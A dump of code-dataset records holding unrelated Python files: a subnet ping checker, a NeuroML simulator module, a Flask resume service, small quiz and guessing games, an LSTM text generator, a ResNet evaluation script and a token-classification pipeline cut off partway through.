\"\"\"Returns the returncode of the ping request.\n Deliberately extracted into function to allow mock of ping request\n \"\"\"\n return response.returncode\n\n\ndef print_results(cidr1, failed_ips1, cidr2, failed_ips2):\n \"\"\"Displays the results of the multithreaded ping queues\n\n Parameters\n ----------\n cidr1 : str\n The first subnet (CIDR1/24)\n cidr2 : str\n The second subnet (CIDR2/24)\n failed_ips1 : list\n List containing tuples of failed CIDR1/24 IP addresses.\n Each tuple contains the final octet and the IP address.\n failed_ips2 : list\n List containing tuples of failed CIDR2/24 IP addresses.\n Each tuple contains the final octet and the IP address.\n\n Returns\n -------\n failed_ips1 : list\n List containing tuples of failed CIDR1/24 IP addresses.\n Each tuple contains the final octet and the IP address.\n failed_ips2 : list\n List containing tuples of failed CIDR2/24 IP addresses.\n Each tuple contains the final octet and the IP address.\n failed_ips1_excl_octets : list\n List containing final octets of pings that failed CIDR1/24 (only).\n failed_ips2_excl_octets : list\n List containing final octets of pings that failed CIDR2/24 (only).\n failed_ips_common_octets : list\n List containing final octets of pings that failed CIDR1/24\n and CIDR2/24 (both).\n \"\"\"\n failed_ips1_octets = [item[0] for item in failed_ips1]\n failed_ips2_octets = [item[0] for item in failed_ips2]\n failed_ips1_addrs = [item[1] for item in failed_ips1]\n failed_ips2_addrs = [item[1] for item in failed_ips2]\n\n failed_ips1_excl_octets, failed_ips_common_octets = [], []\n for octet in failed_ips1_octets:\n if octet not in failed_ips2_octets:\n failed_ips1_excl_octets.append(octet)\n else:\n failed_ips_common_octets.append(octet)\n\n failed_ips2_excl_octets = []\n for octet in failed_ips2_octets:\n if octet not in failed_ips1_octets:\n failed_ips2_excl_octets.append(octet)\n\n failed_ips1_excl_octets.sort()\n failed_ips2_excl_octets.sort()\n failed_ips_common_octets.sort()\n\n if not failed_ips1 and not failed_ips2:\n print(f\"Both {cidr1} and {cidr2} are fully responding to ping \"\n f\"requests. No failures.\")\n else:\n print(f\"Failed ping requests in {cidr1}: \", failed_ips1_addrs)\n print(f\"Failed ping requests in {cidr2}: \", failed_ips2_addrs)\n print(f\"Final octets of failed ping requests in {cidr1}, but not \"\n f\"{cidr2}: \", failed_ips1_excl_octets)\n print(f\"Final octets of failed ping requests in {cidr2}, but not \"\n f\"{cidr1}: \", failed_ips2_excl_octets)\n print(f\"Final octets of failed ping requests in both {cidr1} and \"\n f\"{cidr2}: \", failed_ips_common_octets)\n return (failed_ips1, failed_ips2, failed_ips1_excl_octets,\n failed_ips2_excl_octets, failed_ips_common_octets)\n\n\ndef main(argv):\n \"\"\"Main method which takes arguments from the command line\n Available command line arguments include:\n --cidr1 Allows specification of custom CIDR1/24 subnet\n --cidr2 Allows specification of custom CIDR2/24 subnet\n --skip Allows specification of octet to be excluded from\n ping test\n\n Returns\n -------\n result : list\n \"\"\"\n cidr1 = \"192.168.1.0/24\"\n cidr2 = \"192.168.2.0/24\"\n skip = \"\"\n try:\n opts, args = getopt.getopt(argv, \"h\", [\"cidr1=\", \"cidr2=\", \"skip=\"])\n except getopt.GetoptError:\n print(\"usage: python3 mpts.py --cidr1 --cidr2 \"\n \"--skip \")\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print(\"help: python3 mpts.py --cidr1 --cidr2 \"\n \" --skip \")\n sys.exit()\n if opt in (\"--cidr1\"):\n cidr1 = arg\n if cidr1[-3:] != \"/24\":\n print(\"--cidr1 and --cidr2 accept CIDR/24 subnets only.\")\n sys.exit()\n elif opt in (\"--cidr2\"):\n cidr2 = arg\n if cidr2[-3:] != \"/24\":\n print(\"--cidr1 and --cidr2 accept CIDR/24 subnets only.\")\n sys.exit()\n elif opt in (\"--skip\"):\n skip = arg\n try:\n skip = int(skip)\n assert 0 <= skip <= 255\n except ValueError or AssertionError:\n print(\"--skip must have a valid octet value (0 <= \"\n \"octet <= 255)\")\n sys.exit()\n else:\n assert False, \"unhandled option\"\n\n print(\"\")\n print(\"CIDR1: \", cidr1)\n print(\"CIDR2: \", cidr2)\n result = initiate_ping_queues(cidr1, cidr2, skip)\n return result\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"aethereal7i/mpts","sub_path":"mpts.py","file_name":"mpts.py","file_ext":"py","file_size_in_byte":8901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37725439052","text":"from pyNN import common\nfrom pyNN import __version__\n\nimport logging\n\nname = \"NeuroML2Converter\"\n\nimport neuroml\nimport pyneuroml\nfrom pyneuroml.lems.LEMSSimulation import LEMSSimulation\n\nnml_doc = None\nlems_sim = None\n\nlogger = logging.getLogger(\"PyNN_NeuroML\")\n\ncomment = \"\\n This %s file has been generated from: \\n\" + \\\n \" PyNN v%s\\n\"%__version__ + \\\n \" libNeuroML v%s\\n\"%neuroml.__version__ + \\\n \" pyNeuroML v%s\\n \"%pyneuroml.__version__\n\n\ndef _get_nml_doc(reference=\"PyNN_NeuroML2_Export\",reset=False):\n \"\"\"Return the main NeuroMLDocument object being created\"\"\"\n global nml_doc\n global comment\n if nml_doc == None or reset:\n nml_doc = neuroml.NeuroMLDocument(id=reference)\n nml_doc.notes = comment%'NeuroML 2'\n\n return nml_doc\n\n\ndef _get_main_network():\n \"\"\"Return the main NeuroML network object being created\"\"\"\n return _get_nml_doc().networks[0]\n\ndef _get_lems_sim(reference=None,reset=False):\n \"\"\"Return the main LEMSSimulation object being created\"\"\"\n global lems_sim\n global comment\n if reference == None:\n reference = _get_nml_doc().id\n if lems_sim == None or reset:\n # Note: values will be over written\n lems_sim = LEMSSimulation(\"Sim_%s\"%reference, 100, 0.01, target=reference,comment=comment%'LEMS')\n return lems_sim\n\nclass ID(int, common.IDMixin):\n def __init__(self, n):\n \"\"\"Create an ID object with numerical value `n`.\"\"\"\n int.__init__(n)\n common.IDMixin.__init__(self)\n\nclass State(common.control.BaseState):\n def __init__(self):\n logger.debug(\"State initialised!\")\n common.control.BaseState.__init__(self)\n self.mpi_rank = 0\n self.num_processes = 1\n self.clear()\n self.dt = 0.1\n def run(self, simtime):\n self.t += simtime\n self.running = True\n def run_until(self, tstop):\n logger.debug(\"run_until() called with %s\"%tstop)\n lems_sim = _get_lems_sim()\n lems_sim.duration = float(tstop)\n\n self.t = tstop\n self.running = True\n def clear(self):\n self.recorders = set([])\n self.id_counter = 42\n self.segment_counter = -1\n self.reset()\n def reset(self):\n \"\"\"Reset the state of the current network to time t = 0.\"\"\"\n self.running = False\n self.t = 0\n self.t_start = 0\n self.segment_counter += 1\n\nstate = State()\n","repo_name":"NeuralEnsemble/PyNN","sub_path":"pyNN/neuroml/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":256,"dataset":"github-code","pt":"78"} +{"seq_id":"30495421082","text":"from app.dao.resume_dao import *\nimport jwt\nfrom app.app import app\n\n# 添加基本简历\ndef check_addbase(requst):\n token = requst.headers['token']\n decoded = jwt.decode(token, app.config['SECRET_KEY'], audience='webkit', algorithms=['HS256'])\n user_id=decoded['user_id']\n title=requst.values['title']\n name=requst.values['name']\n birth=requst.values['birth']\n base_resume={\n \"title\":title,\n \"name\":name,\n \"birth\":birth,\n \"user_id\":user_id\n }\n res=addResumeBase(base_resume)\n return res\n\n# 添加工作简历\ndef check_addjob(requst):\n cname=requst.values['cname']\n pname=requst.values['pname']\n basic_id=requst.values['resume_basic_id']\n resume_job={\n \"cname\":cname,\n \"pname\":pname,\n \"resume_basic_id\":basic_id\n }\n res=addResumejob(resume_job)\n return res\n\n# 添加教育简历\ndef check_addedu(requst):\n school=requst.values['school']\n basic_id=requst.values['resume_basic_id']\n resume_edu={\n \"school\":school,\n \"resume_basic_id\":basic_id\n }\n res=addResumejob(resume_edu)\n return res\n\n#更新完善简历\ndef check_updata(requst):\n table=requst.values['table']\n term=requst.values['term']\n new=requst.values['new']\n id=requst.values['id']\n resume_updata = {\n \"table\": table,\n \"term\": term,\n \"new\": new,\n \"id\": id\n }\n res=updataResume(resume_updata)\n return res\n\n#查找简历信息\ndef check_search(requst):\n id=requst.values['tel']\n res=searchResume(id)\n return res\n\n#删除简历信息\ndef check_delete(requst):\n token = requst.headers['token']\n decoded = jwt.decode(token, app.config['SECRET_KEY'], audience='webkit', algorithms=['HS256'])\n id=decoded['user_id']\n res=deleteResume(id)\n return res\n\n#查找简历信息\ndef check_searchResumeBasic(id):\n res=searchResumeBasic(id)\n if len(res):\n for i in range(len(res)):\n jobs=searchResumeJob(res[i]['resume_id'])\n edus = searchResumeEdu(res[i]['resume_id'])\n res[i]['jobs']=jobs\n res[i]['edus']=edus\n return res\n\n\n","repo_name":"Stobadiouth/python-","sub_path":"flask-project/app/service/resume_service.py","file_name":"resume_service.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32904533970","text":"# MQ component 5 - ask user if they want to allow negatives in subtraction equations\n\nimport random\n\n\n# Function to check if the user entered a valid answer (text)\ndef choice_checker(question, valid_list, error):\n valid = False\n while not valid:\n\n # Ask user for choice (and put in lowercase)\n response = input(question).lower()\n\n # iterates through list and if response is an item\n # in the list (or the first letter of an item), the\n # full item name is returned\n\n for item in valid_list:\n if response == item[0] or response == item:\n return item\n\n else:\n print(error)\n\n\nstatement = \"subtraction\"\nlowest = 1\nhighest = 10\n\n# valid lists\nyes_no_list = [\"yes\", \"no\"]\n\nallow_negative = choice_checker(\"Do you want negatives in subtraction questions? \", yes_no_list, \"Please enter yes or no \")\n\nfor item in range(1, 10):\n\n # variable to choose between correct and incorrect answers (1 = correct, 2 = incorrect)\n chosen_num = random.randint(1,2)\n\n # generates two random numbers between lowest and highest\n if statement == \"subtraction\" and allow_negative == \"yes\":\n num_1 = random.randint(lowest, highest)\n num_2 = random.randint(lowest, highest)\n\n if chosen_num == 1:\n\n answer = int(num_1 - num_2)\n\n else:\n\n answer = random.randint(lowest, highest)\n \n elif statement == \"subtraction\" and allow_negative == \"no\":\n num_2 = random.randint(lowest, highest)\n num_1 = random.randint(num_2, highest)\n\n if chosen_num == 1:\n\n answer = int(num_1 - num_2)\n \n else:\n\n answer = random.randint(lowest, highest)\n\n question = \"{} - {} = {}\".format(num_1, num_2, answer)\n\n print(question)\n","repo_name":"Jack-Sh/04_Math_Quiz","sub_path":"05_allow_negative.py","file_name":"05_allow_negative.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34470350818","text":"import random\nimport sys\n\n\ndef jogar():\n\n print(\"**********************************\")\n print(\"*bem vindo ao jogo de adivinhação*\")\n print(\"**********************************\")\n\n\n numero_secreto = random.randrange(0,101)\n total_tentativas = 3\n rodada = 1\n pontos = 1000\n\n print(\"Qual nível de dificuldade?\")\n print(\"(1) - Fácil | (2) - Médio | (3) - Difícil\")\n\n nivel = int(input(\"Define o nível\"))\n\n if (nivel == 1):\n total_tentativas = 20\n elif (nivel == 2):\n total_tentativas = 10\n elif (nivel == 3):\n total_tentativas = 5\n else:\n print(\"Opção incorreta.\")\n sys.exit()\n\n\n\n # função format()\n # print(\"R$ {:07.2f}\".format(1.38))\n\n\n # while - início\n # while(rodada <= total_tentativas):\n for rodada in range(1, total_tentativas + 1):\n print(\"Tentativa {0} de {1} \".format(rodada,total_tentativas))\n chute = input(\"Digite um número entre 1 e 100: \\n\")\n chute = int(chute)\n\n if (chute < 1 or chute > 100):\n print(\"Número fora da área de tentativas\")\n continue\n\n print(\"Você digitou \", chute)\n\n if(numero_secreto == chute):\n print(\"Você acertou e fez {}\".format(pontos))\n break\n else: \n if(chute > numero_secreto):\n print(\"Você errou, o seu chute foi maior que o número secreto\")\n elif(chute < numero_secreto):\n print(\"Você errou, o seu chute foi menor que o número secreto\")\n \n pontos_perdidos = abs(numero_secreto - chute)\n pontos = pontos - pontos_perdidos\n\n print(\"Fim de jogo\")\n \n # while - fim\n\nif(__name__ == \"__main__\"):\n jogar()","repo_name":"marcosfabrejunior/iniciando-python","sub_path":"jogos/adivinhacao.py","file_name":"adivinhacao.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34103114620","text":"import numpy as np\r\nimport pandas as pd\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Dropout\r\nfrom keras.layers import LSTM\r\nfrom keras.utils import np_utils\r\n\r\n\r\n''' =========== Input Layer ============== '''\r\ntext=(open(\"sonnet.txt\").read())\r\ntext=text.lower()\r\ncharacters = sorted(list(set(text)))\r\nn_to_char = {n:char for n, char in enumerate(characters)}\r\nchar_to_n = {char:n for n, char in enumerate(characters)}\r\n\r\n''' ============== Input Layer =============== '''\r\n\r\n''' ============= Data Pre-processing ========== '''\r\nX = [] #Training Array\r\nY = [] #Taregt Array\r\nlength = len(text)\r\nseq_length = 100 #length of the sequence of characters that we want to consider before predicting a particular character.\r\n\r\nfor i in range(0, length-seq_length, 1):\r\n sequence = text[i:i + seq_length]\r\n label =text[i + seq_length]\r\n X.append([char_to_n[char] for char in sequence])\r\n Y.append(char_to_n[label])\r\n \r\n'''\r\nLSTMs accept input in the form of \r\n(number_of_sequences, length_of_sequence, number_of_features) which is not the current format of the arrays. \r\nAlso, we need to transform the array Y into a one-hot encoded format.\r\n'''\r\n\r\nX_modified = np.reshape(X, (len(X), seq_length, 1))\r\nX_modified = X_modified / float(len(characters))\r\nY_modified = np_utils.to_categorical(Y)\r\n\r\n''' ============= Data Pre-processing ========== '''\r\n\r\n''' ============= Modelling ========== '''\r\n\r\nmodel = Sequential()\r\nmodel.add(LSTM(400, input_shape=(X_modified.shape[1], X_modified.shape[2]), return_sequences=True))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(LSTM(400))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(Y_modified.shape[1], activation='softmax'))\r\nmodel.compile(loss='categorical_crossentropy', optimizer='adam')\r\n\r\n''' ============= Modelling ========== '''\r\n\r\n''' ============= Model.Fit ========== '''\r\nmodel.fit(X_modified, Y_modified, epochs=1, batch_size=100)\r\nmodel.save_weights('models/baseline_model.h5')\r\n\r\n\r\n''' ============= Model.Fit ========== '''\r\n\r\n\r\n\r\n''' ============= Generating Text ========== '''\r\n\r\nstring_mapped = X[99]\r\n# generating characters\r\nfor i in range(seq_length):\r\n x = np.reshape(string_mapped,(1,len(string_mapped), 1))\r\n x = x / float(len(characters))\r\n pred_index = np.argmax(model.predict(x, verbose=0))\r\n seq = [n_to_char[value] for value in string_mapped]\r\n string_mapped.append(pred_index)\r\n string_mapped = string_mapped[1:len(string_mapped)]\r\n \r\n''' ============= Generating Text ========== '''\r\n\r\n\r\n''' ============= Combining Text ========== '''\r\n#combining text\r\ntxt=\"\"\r\nfor char in full_string:\r\n txt = txt+char\r\ntxt\r\n''' ============= Combining Text ========== '''","repo_name":"adib0073/MUST_AI_Research","sub_path":"NLP/Text_Generation/LSTM/Text_Generator.py","file_name":"Text_Generator.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"10390261594","text":"import tkinter as tk\r\n#f\r\nfrom tkinter import Checkbutton,Button\r\nwin = tk.Tk()\r\n# win.title('按钮测试')\r\n# win.geometry('300x300')\r\n#\r\n#\r\n# def handler(num):\r\n# print(\"传过来的数字是:\", num)\r\n#\r\n#\r\n# for i in range(5):\r\n# btn = tk.Button(win, text=\"按钮\" + str(i), command=lambda num=i: handler(num))\r\n# btn.pack()\r\n# win.mainloop()\r\n# i = 99\r\nList_Int=[tk.BooleanVar() for _ in range(5)]\r\nprint([id(i) for i in List_Int])\r\nCheckbutton1=Checkbutton(win,text=\"A\",variable=List_Int[0])\r\nCheckbutton1.grid(row=1,column=1)\r\nCheckbutton2 = Checkbutton(win, text=\"B\",variable=List_Int[1])\r\nCheckbutton2.grid(row=1, column=2)\r\nCheckbutton3 = Checkbutton(win, text=\"C\",variable=List_Int[2])\r\nCheckbutton3.grid(row=2, column=1)\r\nCheckbutton4 = Checkbutton(win, text=\"D\",variable=List_Int[3])\r\nCheckbutton4.grid(row=2, column=2)\r\nCheckbutton5=Checkbutton(win,text='E',variable=List_Int[4])\r\nCheckbutton5.grid(row=3,column=1)\r\n\r\n\r\ndef Chcek():\r\n print([x.get() for x in List_Int])\r\n\r\n\r\n\r\nButton1 = Button(win, text='确定', command=Chcek);\r\nButton1.grid(row=3, column=2)\r\nwin.mainloop()","repo_name":"1nancy23/Train-ticket-management-system","sub_path":"choosebox.py","file_name":"choosebox.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24280001445","text":"from datetime import date\r\ntrabalhador = {}\r\nano = date.today().year\r\n\r\ntrabalhador['nome'] =str(input('Nome:'))\r\ntrabalhador['sexo'] = str(input('Sexo:')).strip().upper()[0]\r\ntrabalhador['ano'] = int(input('Ano de nascimento:'))\r\ntrabalhador['clt'] = int(input('Número da carteira (0 não tem):'))\r\nif trabalhador['clt'] == 0:\r\n print('-='*30)\r\n for k,v in trabalhador.items():\r\n print(f' -{k} tem o valor de {v}.')\r\nelse:\r\n trabalhador['ac'] = int(input('Ano que foi contratado:'))\r\n trabalhador['salario'] = float(input('Salário:'))\r\n if trabalhador['sexo'] in 'M':\r\n trabalhador['aposentadoria'] = 66 - ( ano - trabalhador['ac'])\r\n else:\r\n trabalhador['aposentadoria'] = 60 - (ano - trabalhador['ac'])\r\n print('-='*30)\r\n for k,v in trabalhador.items():\r\n print(f' -{k}tem valor de {v}.')","repo_name":"DongoDudongo/exerciciospython","sub_path":"ex102.py","file_name":"ex102.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33949321943","text":"import torch\nimport warnings\n\nimport torch.nn as nn\nimport torch.optim as optim\nimport utils as utility\n\nimport torchvision.transforms as torch_transforms\nimport dataloaders.standford_online_products as sop\nimport nets.resnet as resnet\nimport losses as losses\n\ndef _main(args):\n warnings.filterwarnings(\"ignore\") \n\n #### Constructing Criterion ####\n # criterion = losses.TripletLoss(1.)\n bin_size = 10\n start_bin, end_bin = (0., 4.)\n criterion = losses.FastAP(bin_size, start_bin, end_bin)\n # criterion = losses.TripletLoss(1.)\n \n #### Preparing Test Dataset ####\n test_data_root = './datasets/standford_online_products/test'\n test_data_transform = torch_transforms.Resize((225,225))\n test_num_retrieval_per_class = 10\n test_pos_neighbor, test_neg_neighbor = (True, True) if type(criterion) in [losses.TripletLoss] else (False, False)\n test_dataloader = sop.loader( test_data_root, \\\n data_transform=test_data_transform, \\\n eval_mode=True, \\\n eval_num_retrieval=test_num_retrieval_per_class, \\\n neg_neighbor=test_neg_neighbor, \\\n pos_neighbor=test_pos_neighbor\n )\n\n #### Preparing Validation Dataset ####\n val_data_root = './datasets/standford_online_products/val'\n val_num_retrieval_per_class = test_num_retrieval_per_class\n val_data_transform = torch_transforms.Resize((225,225))\n val_pos_neighbor, val_neg_neighbor = (True, True) if type(criterion) in [losses.TripletLoss] else (False, False)\n val_dataloader = sop.loader(val_data_root, \\\n data_transform=val_data_transform, \\\n eval_mode=True, \\\n eval_num_retrieval=val_num_retrieval_per_class,\\\n neg_neighbor=val_neg_neighbor, \\\n pos_neighbor=val_pos_neighbor\n )\n\n #### Preparing Pytorch ####\n device = args.device\n assert (device in ['cpu', 'multi']) or ( len(device.split(':'))==2 and device.split(':')[0]=='cuda' and int(device.split(':')[1]) < torch.cuda.device_count() ), 'Uknown device: {}'.format( device )\n torch.manual_seed(0)\n if args.device!='multi':\n device = torch.device(args.device)\n if args.gpu and torch.cuda.is_available():\n torch.cuda.manual_seed_all(0)\n\n #### Training Parameters ####\n start_epoch, num_epoch = (args.start_epoch, args.epochs)\n batch_size = args.batch_size\n num_workers = args.num_workers\n check_counter = 10\n\n #### Reports Address ####\n reports_root = './reports'\n analysis_num = args.analysis\n reports_path = '{}/{}'.format( reports_root, analysis_num)\n loading_model_path = '{}/models'.format( reports_path )\n\n #### Constructing Model ####\n pretrained = args.pretrained and False\n num_classes = 512\n \n model = None\n if args.resnet_type=='resnet18':\n model = resnet.resnet18(pretrained=pretrained)\n elif args.resnet_type=='resnet34':\n model = resnet.resnet34(pretrained=pretrained)\n elif args.resnet_type=='resnet50':\n model = resnet.resnet50(pretrained=pretrained)\n elif args.resnet_type=='resnet101':\n model = resnet.resnet101(pretrained=pretrained)\n elif args.resnet_type=='resnet152':\n model = resnet.resnet152(pretrained=pretrained)\n # elif args.resnet_type=='resnext50_32x4d':\n # model = resnet.resnet18(pretrained=pretrained, num_classes=num_classes)\n # elif args.resnet_type=='resnext101_32x8d':\n # model = resnet.resnext101_32x8d(pretrained=pretrained, num_classes=num_classes)\n model.fc = nn.Linear(512 * 1, num_classes)\n \n #### Validation ####\n print('{} Validation {}'.format('#'*32, '#'*32))\n for epoch in range(start_epoch, start_epoch+num_epoch):\n print('{} epoch = {} {}'.format('='*32, epoch, '='*32))\n\n #### Constructing Optimizer ####\n optimizer = None\n if args.optimizer=='sgd':\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n elif args.optimizer=='adam':\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n \n #### Loading Model ####\n model, optimizer = resnet.load( loading_model_path,\n 'resnet_epoch_{}'.format( epoch ),\n model,\n optimizer=optimizer\n )\n\n if args.gpu and torch.cuda.is_available():\n if device=='multi':\n model = nn.DataParallel(model)\n else:\n model = model.cuda(device=device)\n\n resnet.eval(\n resnet=model,\n eval_data=val_dataloader,\n criterion=criterion,\n report_path=reports_path,\n epoch=epoch,\n device=device,\n batch_size=batch_size,\n num_workers=num_workers,\n check_counter=check_counter,\n gpu=args.gpu and torch.cuda.is_available(),\n eval_mode='val'\n )\n \n #### Testing ####\n print('{} Test {}'.format('#'*32, '#'*32))\n model, optimizer = resnet.load( loading_model_path,\n 'resnet_epoch_{}'.format( start_epoch+num_epoch-1 ),\n model,\n optimizer=optimizer\n )\n #### Constructing Optimizer ####\n optimizer = None\n if args.optimizer=='sgd':\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n elif args.optimizer=='adam':\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n\n if args.gpu and torch.cuda.is_available():\n if device=='multi':\n model = nn.DataParallel(model)\n else:\n model = model.cuda(device=device)\n \n resnet.eval(\n resnet=model,\n eval_data=test_dataloader,\n criterion=criterion,\n report_path=reports_path,\n epoch=start_epoch+num_epoch-1,\n device=device,\n batch_size=batch_size,\n num_workers=num_workers,\n check_counter=check_counter,\n gpu=args.gpu and torch.cuda.is_available(),\n eval_mode='test'\n )\n\nif __name__ == \"__main__\":\n args = utility.get_args()\n _main(args)\n","repo_name":"ahedayat/FastAP","sub_path":"resnet_eval.py","file_name":"resnet_eval.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"72807813065","text":"import math\nfrom collections import deque\n\ndef init_rectangle(graph, rectangle):\n for left_down_x, left_down_y, right_up_x, right_up_y in rectangle:\n for i in range(left_down_x, right_up_x + 1):\n graph[left_down_y][i] = 1\n graph[right_up_y][i] = 1\n for i in range(left_down_y, right_up_y + 1):\n graph[i][right_up_x] = 1\n graph[i][left_down_x] = 1\n\ndef check_in_rectangle(rectangle: list, x, y):\n # 하나라도 안에 들어갈 경우\n if any (left_down_x < x < right_up_x and left_down_y < y < right_up_y\n for left_down_x, left_down_y, right_up_x, right_up_y in rectangle):\n return False\n # 이용 가능\n return True\n\ndef check_rain_side(rectangle: list, before_x, before_y, after_x, after_y):\n\n if before_y == after_y:\n if before_x > after_x:\n before_x, after_x = after_x, before_x\n # 하나라도 안에 들어갈 경우\n if any (left_down_x <= before_x < after_x <= right_up_x and\n (before_y == left_down_y or before_y == right_up_y)\n for left_down_x, left_down_y, right_up_x, right_up_y in rectangle):\n return True\n if before_x == after_x:\n if before_y > after_y:\n before_y, after_y = after_y, before_y\n\n # 하나라도 안에 들어갈 경우\n if any(left_down_y <= before_y < after_y <= right_up_y and\n (before_x == left_down_x or before_x == right_up_x)\n for left_down_x, left_down_y, right_up_x, right_up_y in rectangle):\n return True\n # 이용 가능\n return False\n\ndef check_rain_side_final(rectangle: list, before_x, before_y, after_x, after_y):\n if before_y == after_y:\n if before_x > after_x:\n before_x, after_x = after_x, before_x\n # 하나라도 안에 들어갈 경우\n if any (left_down_y < before_y < right_up_y and before_x == left_down_x and\n after_x == right_up_x\n for left_down_x, left_down_y, right_up_x, right_up_y in rectangle):\n return False\n if before_x == after_x:\n if before_y > after_y:\n before_y, after_y = after_y, before_y\n # 하나라도 안에 들어갈 경우\n if any(left_down_x < before_x < right_up_x and before_y == left_down_y and\n after_y == right_up_y\n for left_down_x, left_down_y, right_up_x, right_up_y in rectangle):\n return False\n # 이용 가능\n return True\n\ndef direction(graph, x, y, q: deque, rectangle):\n nx = [0, 1, 0, -1]\n ny = [1, 0, -1, 0]\n for i in range(4):\n dx = nx[i] + x\n dy = ny[i] + y\n if -1 < dx < 102 and -1 < dy < 102 and graph[dy][dx] == 1 \\\n and check_in_rectangle(rectangle, dx, dy)\\\n and check_rain_side(rectangle, x, y, dx, dy)\\\n and check_rain_side_final(rectangle, x, y, dx, dy):\n graph[dy][dx] = graph[y][x] + 1\n q.append((dx, dy))\n\n\ndef bfs(graph, rectangle, q, itemX, itemY):\n\n while q:\n (x,y) = q.popleft()\n if x == itemX and y == itemY:\n return graph[y][x]\n direction(graph, x, y, q, rectangle)\n return -1\n\n\ndef solution(rectangle, characterX, characterY, itemX, itemY):\n graph = [[0]*102 for _ in range(102)]\n\n init_rectangle(graph, rectangle)\n q = deque()\n graph[characterY][characterX] = 0\n q.append((characterX, characterY))\n\n answer = bfs(graph, rectangle, q, itemX, itemY)\n # for i in range(10):\n # check = []\n # for j in range(10):\n # check.append(graph[i][j])\n # print(check)\n # # print(graph[itemY][itemX])\n return answer\n\n\ndef main():\n print(solution(\t[[2, 2, 5, 5], [1, 3, 6, 4], [3, 1, 4, 6]], 1, 4, 6, 3))\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"fineman999/Algorithm","sub_path":"Programmers/Kit/DFS_BFS/pick_up_items.py","file_name":"pick_up_items.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14850706613","text":"from typing import Any, Dict, Union\n\nfrom torchmetrics.classification.accuracy import MulticlassAccuracy\nfrom torchmetrics.classification.f_beta import MulticlassF1Score\nfrom transformers.configuration_utils import PretrainedConfig\nfrom transformers.tokenization_utils_base import PreTrainedTokenizerBase\n\nfrom transformers_framework.architectures.modeling_outputs import TokenClassOutput\nfrom transformers_framework.interfaces.adaptation import token_classification_adaptation\nfrom transformers_framework.interfaces.logging import (\n LOSS,\n TOKEN_CLASS_ACCURACY,\n TOKEN_CLASS_F1,\n TOKEN_CLASS_LOSS,\n TOKEN_CLASS_PERPLEXITY,\n)\nfrom transformers_framework.interfaces.step import TokenClassStepOutput\nfrom transformers_framework.metrics.perplexity import Perplexity\nfrom transformers_framework.pipelines.pipeline import Pipeline\nfrom transformers_framework.processing.postprocessors import token_class_processor\nfrom transformers_framework.utilities import IGNORE_IDX\nfrom transformers_framework.utilities.arguments import FlexibleArgumentParser, add_token_class_arguments\n\n\nclass TokenClassPipeline(Pipeline):\n r\"\"\" A model that does token classification for NER or POS. \"\"\"\n\n POST_FORWARD_ADAPTER = token_classification_adaptation\n MODEL_INPUT_NAMES_TO_REDUCE = [\n ('input_ids', 'attention_mask', 'token_type_ids', 'token_class_labels')\n ]\n\n def __init__(self, hyperparameters):\n super().__init__(hyperparameters)\n\n metrics_kwargs = dict(average=None, ignore_index=IGNORE_IDX, num_classes=self.config.num_labels)\n ppl_kwargs = dict(ignore_index=IGNORE_IDX)\n\n # train metrics\n self.train_acc = MulticlassAccuracy(**metrics_kwargs)\n self.train_f1 = MulticlassF1Score(**metrics_kwargs)\n self.train_ppl = Perplexity(**ppl_kwargs)\n\n # validation metrics\n self.valid_acc = MulticlassAccuracy(**metrics_kwargs)\n self.valid_f1 = MulticlassF1Score(**metrics_kwargs)\n self.valid_ppl = Perplexity(**ppl_kwargs)\n\n # test metrics\n self.test_acc = MulticlassAccuracy(**metrics_kwargs)\n self.test_f1 = MulticlassF1Score(**metrics_kwargs)\n self.test_ppl = Perplexity(**ppl_kwargs)\n\n def setup_config(self, **kwargs) -> Union[PretrainedConfig, Dict[str, PretrainedConfig]]:\n kwargs['num_labels'] = self.hyperparameters.num_labels\n return super().setup_config(**kwargs)\n\n def setup_tokenizer(self) -> PreTrainedTokenizerBase:\n return super().setup_tokenizer(add_prefix_space=True)\n\n def step(self, batch: Dict) -> TokenClassStepOutput:\n r\"\"\" Forward step is shared between all train/val/test steps. \"\"\"\n results: TokenClassOutput = self.forward(**batch)\n\n return TokenClassStepOutput(\n loss=results.token_class_loss,\n token_class_loss=results.token_class_loss,\n token_class_predictions=results.token_class_logits.argmax(dim=-1),\n token_class_logits=results.token_class_logits,\n token_class_labels=batch['token_class_labels'],\n )\n\n def training_step(self, batch, *args):\n r\"\"\" Here you compute and return the training loss and some additional metrics for e.g.\n the progress bar or logger.\n \"\"\"\n step_output = self.step(batch)\n\n acc = 